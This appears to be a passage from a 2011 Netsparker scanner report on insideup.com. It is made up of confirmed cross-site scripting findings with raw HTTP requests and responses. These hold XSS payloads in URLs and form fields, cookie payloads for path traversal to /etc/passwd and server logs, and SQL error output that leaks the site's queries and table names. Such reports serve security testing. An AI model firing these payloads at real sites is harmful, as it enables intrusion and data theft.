prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>' OR prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>' OR prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>' OR prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>' OR prj.project_page_url = 'leadflow/css/ui.core.css'"--></style></script><script>netsparker(0x0013CA)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013CA)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/css/Dyn_form_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013D1)%3C/script%3E

/ppc/leadflow/css/Dyn_form_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013D1)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/css/Dyn_form_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0013D1)</script>

Request

GET /ppc/leadflow/css/Dyn_form_style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0013D1)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fabdtlslb15johkh1fkatf3d91; path=/
Content-Length: 3103
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>' OR prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>' OR prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>' OR prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on 
grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>' OR prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>' OR prj.project_page_url = 'leadflow/css/Dyn_form_style.css'"--></style></script><script>netsparker(0x0013D1)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0013D1)</script>/' union select prj.catI' at line 5
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST '"--></style></script><script>alert(0x0013D6)</script>
companyName POST Smith
password1 POST 3
password2 POST 3
termsOfService POST 1
receiveSpecialOfferEmail POST 1
x POST 0
y POST 0

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 308
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress=netsparker%40example.com&firstName=Smith&lastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0013D6)%3c%2fscript%3e&companyName=Smith&password1=3&password2=3&termsOfService=1&receiveSpecialOfferEmail=1&x=0&y=0

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:33 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=F7C5223AE6BFA5B705E22164ABCBEF59; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST '"--></style></script><script>alert(0x0013DE)</script>
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 260
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&companyName=Smith&password1='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0013DE)%3c%2fscript%3e&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:42:34 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=DDF1C95C2918A187514FB7C3704C36A4; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


- /ppc/leadflow/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0013ED)%3C/script%3E

